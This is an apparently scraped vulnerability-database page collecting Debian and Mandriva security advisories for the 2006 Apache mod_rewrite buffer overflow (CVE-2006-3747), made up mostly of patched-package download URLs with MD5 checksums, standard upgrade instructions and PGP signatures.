      Size/MD5 checksum:   328478 565500d14485fdfc229d31094477d79d

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:    33488 c097912333905a2634218aca2f925af4
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   880192 bbf9181e42bf15946ea823bd4c60187a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   228778 3f678491b1a4cdf7087ba3f7b579d2e4
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   222784 53c3247eb337389bf5610ffdc12101aa
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   227604 a55def8a3be473430a5add57f74a9e3e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   167694 d986e8cc3ad0512e9e37d9d22209df6a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   168436 77ed5eaaad9378052171f6317ba7f3b0
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:    98822 048922c9ca8664f57b80c2f45f401d7f
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   144996 20192edf00b0449ef13a9c104750c1fb
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_hppa.deb
      Size/MD5 checksum:   285012 86cf97e94f01f18e3c2263d94eb3f4f2

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:    33496 7ed8701d7c988c636a45eb66ea558b11
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   783354 bbd0d75542a89db2b9af3fda0801251b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   188908 1798d4afe93c070b947be8d80097a3a5
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   185514 1c0bf8a9a6f173753080c77af11fde0b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   188314 c188c7e4ab5c0bd9af90e3cce04cb119
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   167770 7c804084f4c5104ea0e1759664bfc950
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   168494 46bb18ed1ad60faee0356fcf927a8d7e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:    88058 4dd93405f96d8a1504403b5e807ed11d
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   117584 c02517bf4a19a576ceb5eb53788b8ddb
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_m68k.deb
      Size/MD5 checksum:   250068 f9858a08d86d3c5da03ce9ab5742c807

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:    33492 99198a05154084edcf0a023b4178c174
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   807540 b5be0b94c36ef91ad37f8e97ee38da6b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   217966 40962c3bb0de39504e18a3e4d17960d4
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   213184 17b42ce494efe8d695083b65c18bd04f
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   217340 af8e8d55645e3f8515838cc6a4d0b96a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   167712 62bcc19fbe039422058de75fac9ef8a2
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   168456 97347f55c5ca750159492a5e9fef0f05
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   103016 7dfdbeb967d4db76535e326fe3bbe831
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   134456 fefc232dee0333abe758f480922e485a
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mips.deb
      Size/MD5 checksum:   286508 e450f3a5c862321728f126fd27e67da8

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:    33492 a0beae9521a8681328ed01833936c7e6
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   807356 efa828902d16f408dc2fb75344a02484
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   217238 f61a494fe69366f8f0f319ec622c125d
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   212602 1e168ac088ef73b5a9ae213eaed0e65b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   216474 4da5c94813eb4c75e4c39e464b459286
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   167712 91d4f8ca1a018c1d772d2436a40c264a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   168454 810be6456b1b49e29c2ad063677df5d7
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   102908 4053b03ba06284397e0a2e049ac0b07e
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   134504 4cf1d17baaceacbd49aff1a5f0386eb9
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mipsel.deb
      Size/MD5 checksum:   287146 327a38414b6477d2bfc899b6c36814a4

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:    33488 a02c59618834f05f05875bfb44db86a8
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   856080 7f25f6e8e6e6861106e349f49de39f3f
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   214658 4542ef6b2b9b2cad21c9b43cc090cc20
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   209732 a77570da8616c950a61c3e1f1774d263
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   213720 0187a654fc3972354c4b1ce9f25b298e
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   167700 23b513fe1438e05bfb285c6b2ba5fa88
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   168438 2fdbfc52471761f05ac81c88104df718
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   102074 e3e2f1cce29967a7f16d482c5a12f31e
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   134326 a065ca58466cb424e6fdecf4916a34ab
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_powerpc.deb
      Size/MD5 checksum:   272016 1036f4767ca54dcf7f9ea8a0ccd7219b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:    33484 be5320d7ff7f2535f2c2afcc1c1a0017
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   836920 0217fc29e0cd0c73ffc16321ac76ee67
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   223934 b8fe548deef75a8474c513ffeaef612b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   219814 03b24d5271b0d0392de3cae6a8b2cddc
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   223316 b19825c6436769e45e9ff4b304893e0a
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   167674 b927beaf64fcf061278749e9112f606b
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   168406 2a691c0d5a113e67dbe4428f33850b55
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:    95882 f4f2d57ef253b639334593daee4ea458
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   145992 524ec24014483b5380e1f498fc96eb71
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_s390.deb
      Size/MD5 checksum:   275226 812a50d7371049f438c8469dd72aaab7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:    33492 e1759ef13bc51722b31ac10f9469ab11
    http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   802626 7936568d0f0220d40a0c24c020188e92
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   205614 75b026656494f526a4c53c7202ef4a85
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   200878 a9195c31cdba9cd787cad14eba216719
    http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   204536 f0f6b6b0b5e4222e35deb55b955c1241
    http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   167688 1f9b82c2aa5ef014de1a00279fba8acc
    http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   168428 1055661a5018ca3698a508dac343a5ef
    http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:    91002 a2c433609f36de5d6d0e8ae5ad367fb2
    http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   123598 5739e26b7619a2a36a0541288b45e91a
    http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_sparc.deb
      Size/MD5 checksum:   260480 d21565096a339f3e4cbff58cf5deb352


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEz091wM/Gs81MDZ0RAm7XAJ9RfePMZ5SeJj07/5hZRYJExSNs8QCfd7ak
XbcmFaJ79jabp0d3jvc2RQE=
=Gaio
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F48976)

Debian Linux Security Advisory 1131-1 (PacketStormID:F48976)
2006-08-17 00:00:00
Debian  debian.org
advisory,remote,web,overflow
linux,debian
CVE-2006-3747
[点击下载]

Debian Security Advisory 1131-1 - Mark Dowd discovered a buffer overflow in the mod_rewrite component of apache, a versatile high-performance HTTP server. In some situations a remote attacker could exploit this to execute arbitary code

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1131-1                    security@debian.org
http://www.debian.org/security/                                 Steve Kemp
Aug 1st, 2006                           http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : apache
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3747
CERT advisory  : VU#395412
Debian Bug     : 380231

Mark Dowd discovered a buffer overflow in the mod_rewrite component of
apache, a versatile high-performance HTTP server.  In some situations a
remote attacker could exploit this to execute arbitary code.

For the stable distribution (sarge) this problem has been fixed in version 1.3.33-6sarge2.

For the unstable distribution (sid) this problems will be fixed shortly.

We recommend that you upgrade your apache package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------


  Source archives:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.dsc
      Size/MD5 checksum:     1119 8188c2fe660d475970139af295b07b86
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.diff.gz
      Size/MD5 checksum:   372930 40c5ca3d91d1307a191915459bc94237
    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33.orig.tar.gz
      Size/MD5 checksum:  3105683 1a34f13302878a8713a2ac760d9b6da8

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.33-6sarge2_all.deb
      Size/MD5 checksum:   334562 a6a506713c09c27143feffe738aed3f9
    http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.33-6sarge2_all.deb
      Size/MD5 checksum:  1332888 f24fa9421e8dc9acec2467b58468f2dd
    http://security.debian.org/pool/updates/main/a/apache/apache-utils_1.3.33-6sarge2_all.deb
      Size/MD5 checksum:   212626 b9a5198ee442212cdd248be8827400a1

  Alpha architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_alpha.deb
      Size/MD5 checksum:   428152 a58caae837e1025d97cf44bf8fb23f0f
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_alpha.deb
      Size/MD5 checksum:   904242 ce2a0e4b97c1926dafdf31e589883995
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_alpha.deb
      Size/MD5 checksum:  9223072 182f1789104e294f72fede75dc13b875
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_alpha.deb
      Size/MD5 checksum:   569406 185346b21b2adbc248a06f689f094b97
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_alpha.deb
      Size/MD5 checksum:   542576 dfe389cdb48d38ee2a27a3a622a6c6e0
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_alpha.deb
      Size/MD5 checksum:   505050 36759af8debeceeebdd083a337e590cb

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_amd64.deb
      Size/MD5 checksum:   401466 6d45b8e9a23382f6b2eadc28af28e4a4
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_amd64.deb
      Size/MD5 checksum:   876652 7474a08ccd74235787761b8e1ffe8c0e
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_amd64.deb
      Size/MD5 checksum:  9162572 b55d8df232edbd900372fe339a065fd1
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_amd64.deb
      Size/MD5 checksum:   524410 41142b30d22c99476977c339cf071504
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_amd64.deb
      Size/MD5 checksum:   513708 5377d3aa2ad92e07db2654d3fd3761d1
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_amd64.deb
      Size/MD5 checksum:   492544 2d15619f2db2d39d6abdaf25574fbf4c

  ARM architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_arm.deb
      Size/MD5 checksum:   384260 7785f5fa4d814bd1a1ec946fe007ec53
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_arm.deb
      Size/MD5 checksum:   841372 83ed59ba296d64b5b6731c3a57902810
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_arm.deb
      Size/MD5 checksum:  8985914 50fc722807a399105950b15e5eaba3b3
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_arm.deb
      Size/MD5 checksum:   495910 f7d7a9218c3bdabbf0982b3ec563bca6
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_arm.deb
      Size/MD5 checksum:   489556 7645d9195f00f4bf0c655eefaf971dff
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_arm.deb
      Size/MD5 checksum:   479280 e689e83904766cf209049c39fe3ee2d1

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_i386.deb
      Size/MD5 checksum:   386664 0f0192626abd5a456bf7b6d43f9f1708
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_i386.deb
      Size/MD5 checksum:   860158 60891f21e526885833f7f7fcf43c92e4
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_i386.deb
      Size/MD5 checksum:  9124844 9d2e020813d5298c3f4d62dcd8ec6aaa
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_i386.deb
      Size/MD5 checksum:   504860 a084ffd32a38948db9dd0692ead50eeb
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_i386.deb
      Size/MD5 checksum:   493690 c442e0c156f98044c20a665d989aeca0
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_i386.deb
      Size/MD5 checksum:   486804 3862e6781f044fc2c4ae24170f47fe6f

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_ia64.deb
      Size/MD5 checksum:   463372 13eb11e0de167d54b6606605ae1ff0f6
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_ia64.deb
      Size/MD5 checksum:   971834 2be725f2e6b84c10c512a0d804480e33
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_ia64.deb
      Size/MD5 checksum:  9355772 3b5d28d3d2531719d46c23920dd3e94c
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_ia64.deb
      Size/MD5 checksum:   627356 247a7da511dae2d5e698f2b424fe24c5
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_ia64.deb
      Size/MD5 checksum:   585922 aa5d4b2f9bcefe026da9168170e0c819
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_ia64.deb
      Size/MD5 checksum:   532826 9b9c3b43b6e85e92dd2c064871f7d9f3

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_hppa.deb
      Size/MD5 checksum:   406614 50c84b8682cd3b8af4e0eceaf7fd505a
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_hppa.deb
      Size/MD5 checksum:   905560 b02464bd2a9c5ca732e0c4f9208baee0
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_hppa.deb
      Size/MD5 checksum:  9100908 4516c9ad78527b3cb2be9daef76e9566
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_hppa.deb
      Size/MD5 checksum:   536024 e8ab5a278d1424ef9d68c155ae3a7ab8
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_hppa.deb
      Size/MD5 checksum:   518824 c6befb0053d4ed7daa9e9f3d1538bbb6
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_hppa.deb
      Size/MD5 checksum:   508750 6beec32a45b93df126f4973619c6076a

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_m68k.deb
      Size/MD5 checksum:   371072 d4f978e09502b619b7933e23290eaf5e
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_m68k.deb
      Size/MD5 checksum:   847234 8ca3d2d72183081217ae742327dd49f7
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_m68k.deb
      Size/MD5 checksum:  8973668 e6614fd4445efa2a29002d5f02d0b7c5
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_m68k.deb
      Size/MD5 checksum:   448692 e2024a331a75dabd3ff86927a1883cbc
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_m68k.deb
      Size/MD5 checksum:   477360 43f62ac274ccd93160d1db6d3110ebe6
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_m68k.deb
      Size/MD5 checksum:   489432 df5d49e0e858809966e4395cdfcab073

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mips.deb
      Size/MD5 checksum:   403276 4ff63b289978627f3db22de263e158ef
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mips.deb
      Size/MD5 checksum:   851592 3e0d11bf481c1378ff776062dc2eed70
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mips.deb
      Size/MD5 checksum:  9048564 aa4a667fdc83d41e739b69c949967929
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mips.deb
      Size/MD5 checksum:   485152 0672cc250050d8e0e571ced7cb4420a0
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mips.deb
      Size/MD5 checksum:   509872 09572aa1dd63bd7b1bff9b61d5752358
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mips.deb
      Size/MD5 checksum:   443532 6efd073b42b13599960f29ff9263892a

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mipsel.deb
      Size/MD5 checksum:   403652 6906feb21ddb7af2a5ec9d4c2ccd874c
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mipsel.deb
      Size/MD5 checksum:   849942 5786e24b7849df4eea36f3d3da80a82a
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mipsel.deb
      Size/MD5 checksum:  9054052 f0d853c8399534429fcd2a3463016ef1
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mipsel.deb
      Size/MD5 checksum:   485376 9001e3d37ac660635946eb066e50ec78
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mipsel.deb
      Size/MD5 checksum:   510664 398e615c936d6e72bb443ce3550e57e2
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mipsel.deb
      Size/MD5 checksum:   443422 e3a6f0ca68df1d8e8f26eef8f23b2822

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_powerpc.deb
      Size/MD5 checksum:   398666 29de2415f45cd033d04c28be500664ee
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_powerpc.deb
      Size/MD5 checksum:   921400 c36acb601638cb0a9961a2f5d95fcb28
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_powerpc.deb
      Size/MD5 checksum:  9252458 aa5f5cdc62365a6951cb6a67e005dc34
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_powerpc.deb
      Size/MD5 checksum:   515350 0d654fea1e92be4c2bb1375b6a51c060
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_powerpc.deb
      Size/MD5 checksum:   510372 15269ec946e59741172a69c8e7ea7557
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_powerpc.deb
      Size/MD5 checksum:   490708 2b1e1ae12a9cb2e8f59b6b8b219d7f9e

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_s390.deb
      Size/MD5 checksum:   403204 73201862887af010def1edf24d22594d
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_s390.deb
      Size/MD5 checksum:   868450 b84df926a3235d152d8f7f35aa3394ae
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_s390.deb
      Size/MD5 checksum:  9183050 1cf5c335b2cf863898c0c84e4e150776
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_s390.deb
      Size/MD5 checksum:   490090 b361f3cf52b919b5e92d96f92a77270a
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_s390.deb
      Size/MD5 checksum:   514442 d3374e5f0d5cb468409795a1a7c9b8b3
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_s390.deb
      Size/MD5 checksum:   460466 bf56d745cf3b78e3ade0204a718417c6

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_sparc.deb
      Size/MD5 checksum:   385534 020faf78c7c61702c94d10eb03a07e37
    http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_sparc.deb
      Size/MD5 checksum:   849304 2cffd052a21ba9306ebadf4af2f6b734
    http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_sparc.deb
      Size/MD5 checksum:  9046234 f32d81e7736df5b65bf9912506b03466
    http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_sparc.deb
      Size/MD5 checksum:   504168 e3a5510199db8f05f5a6f3028b82ef11
    http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_sparc.deb
      Size/MD5 checksum:   491970 4f9732af9bcf8e6ecc54cb24f65b7d0b
    http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_sparc.deb
      Size/MD5 checksum:   490256 9c6e61c66d2f8641680f6f7dfe7316fe


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEzzCzwM/Gs81MDZ0RAqM9AJ9pezh9ub2VryJ8X13FpiWm0THOwQCgmd4w
Qf4EYm8EnwbI7VB7WmKq7V4=
=JjUs
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F48771)

Mandriva Linux Security Advisory 2006.133 (PacketStormID:F48771)
2006-08-03 00:00:00
Mandriva  mandriva.com
advisory
linux,mandriva
CVE-2006-3747
[点击下载]

Mandriva Linux Security Advisory MDKSA-2006-133 - Mark Dowd, of McAffee Avert Labs, discovered a potential remotely exploitable off-by-one flaw in Apache's mod_rewrite ldap scheme handling.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:133
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : apache
 Date    : July 28, 2006
